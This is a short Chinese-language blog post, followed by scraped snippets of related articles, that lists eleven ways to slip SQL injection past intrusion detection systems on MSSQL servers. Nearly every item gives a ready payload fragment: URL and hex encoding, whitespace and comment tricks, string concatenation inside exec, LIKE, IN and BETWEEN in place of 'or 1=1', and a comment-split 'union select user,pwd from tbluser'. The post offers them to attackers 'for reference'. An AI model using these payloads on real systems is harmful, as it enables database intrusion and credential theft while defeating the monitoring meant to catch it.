SQL Injection規避入侵檢測技術總結

2021-04-13 13:26:58 字數 1410 閱讀 3042

當我們對乙個執行ids系統的伺服器進行sql注射時,我們往往會遇到很大的麻煩,因為我們的注射語句被過濾了,如何規避這種檢測手段就成了一門新的技術,本文就對此規避技術提出十一條思路和方法,與大家商戳。

一、 運用編碼技術繞過,如urlencode編碼,ascii編碼繞過。

如or 1=1即%6f%72%20%31%3d%31

test即char(101)+char(97)+char(115)+char(116)

二、 通過空格繞過

如兩個空格代替乙個空格,用tab代替空格等,或者刪除所有空格,如or』swords』=『swords』,由於mssql的鬆散性,我們可以把or 『swords』之間的空格去掉,並不影響執行。

三、 運用字串判斷代替經典的or 1=1判斷繞過

如or 『swords』=『swords』

四、 通過型別轉換修飾符n繞過

如or 『swords』 = n』swords』,大寫的n告訴mssql server 字串作為nvarchar型別,它起到型別轉換的作用,並不影響注射語句本身,但是可以避過基於知識的模式匹配ids。

五、 通過+號拆解字串繞過,

如 or 『swords』=『sw』+』ords』;exec(『in』+』sert into 『+』…..』)

六、 通過like繞過,如or 『swords』 like 『sw』

七、 通過in繞過,如or 『swords』 in (『swords』)

八、 通過between繞過, 如or 『swords』 between 『rw』 and 『tw』

九、 通過》或者《繞過,如

or 『swords』>『sw』

or 『swords』<『tw』

or 1<3

十、 運用注釋語句繞過:

用/**/代替空格,如:

union /**/ select /**/user,pwd,from tbluser

用/**/分割敏感詞,如:

u/**/ nion /**/ se/**/ lect /**/user,pwd from tbluser

十一、 用hex繞過,一般的ids都無法檢測出來。

0x730079007300610064006d0069006e00 =hex(sysadmin)

0x640062005f006f0077006e0065007200 =hex(db_owner)

以上的十一條sql injection規避入侵檢測技術供您參考。 

《SQL Injection規避入侵檢測技術總結》

sql injection規避入侵檢測技術總結 sql injection規避入侵檢測技術總結 當我們對乙個執行ids系統的伺服器進行sql注射時,我們往往會遇到很大的麻煩,因為我們的注射語句被過濾了,如何規避這種檢測手段就成了一門新的技術,本文就對此規避技術提出十一條思路和方法,與大家商戳。一 運...

SQL Injection規避入侵檢測技術總結

當我們對乙個執行ids系統的伺服器進行sql注射時,我們往往會遇到很大的麻煩,因為我們的注射語句被過濾了,如何規避這種檢測手段就成了一門新的技術,本文就對此規避技術提出十一條思路和方法,與大家商戳。一 運用編碼技術繞過,如urlencode編碼,ascii編碼繞過。如or 1 1即 6f 72 20...

SQL Injection高階應用

灌一篇水,寫一點關於sql injection的高階應用,針對sql server的。我假設你已經非常了解sql injection的基本概念。目標探測 當大多數人都意識到sql injection的威脅並進行一番修補之後,可能很難再找到下手的地方。但若想成功就必需要冷靜耐心,當然有時也需要一點點運...